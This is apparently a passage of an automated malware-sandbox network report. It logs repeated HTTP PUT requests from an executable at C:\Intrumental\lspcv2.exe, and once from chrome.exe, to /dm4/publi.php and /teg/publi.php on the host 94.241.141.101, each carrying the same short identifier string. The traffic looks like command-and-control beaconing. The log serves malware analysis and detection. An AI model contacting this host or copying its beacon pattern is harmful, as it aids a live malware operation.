                                                                                                                  Nov 14, 2024 15:01:31.492726088 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:31 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  117192.168.2.45016494.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:30.740637064 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:30.748332977 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:31.633388996 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:31 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  118192.168.2.45017194.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:31.612411976 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:31.617727041 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:32.543267965 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:32 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  119192.168.2.45017294.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:31.753701925 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:31.758687973 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:32.689899921 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:32 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  120192.168.2.45017994.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:32.606503010 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:32.611509085 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:33.493434906 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:33 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  121192.168.2.45018094.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:32.658951044 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:32.664319038 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:33.546020031 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:33 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  122192.168.2.45018194.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:32.814412117 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:32.822105885 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:33.725588083 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:33 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  123192.168.2.45018794.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:33.621603966 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:33.627060890 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:34.552920103 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:34 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  124192.168.2.45018894.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:33.676103115 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:33.681041002 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:34.545564890 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:34 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  125192.168.2.45019094.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:33.843502045 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:33.848422050 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:34.739825964 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:34 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  126192.168.2.45019194.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:34.668690920 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:34.680645943 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:35.600949049 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:35 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  127192.168.2.45019294.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:34.680649042 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:34.685610056 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:35.578666925 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:35 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  128192.168.2.45019394.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:34.859108925 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:34.864061117 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:35.759759903 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:35 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  129192.168.2.45019494.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:35.703675032 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:35.709029913 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:36.591629982 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:36 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  130192.168.2.45019594.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:35.714353085 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:35.719783068 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:36.596904039 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:36 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  131192.168.2.45019694.241.141.101807208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:35.876508951 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:35.881828070 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:36.749599934 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:36 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  132192.168.2.45019794.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:36.716801882 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:36.722615957 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:37.596760035 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:37 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  133192.168.2.45019894.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:36.720300913 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:36.725596905 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:37.607450008 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:37 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  134192.168.2.45019994.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:36.880135059 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:36.884994984 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:37.787271023 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:37 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  135192.168.2.45020094.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:37.714978933 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:37.720057964 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:38.630162001 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:38 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  136192.168.2.45020194.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:37.735080004 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:37.742115021 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:38.626394987 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:38 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  137192.168.2.45020294.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:37.910877943 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:37.915844917 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:38.792589903 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:38 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  138192.168.2.45020394.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:38.751005888 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:38.756357908 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:39.655375957 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:39 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  139192.168.2.45020494.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:38.751466990 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:38.756756067 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:39.630755901 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:39 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  140192.168.2.45020594.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:38.922874928 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:38.927962065 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:39.811424017 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:39 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  141192.168.2.45020694.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:39.745696068 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:39.750616074 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:40.628463030 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:40 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  142192.168.2.45020794.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:39.781836987 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
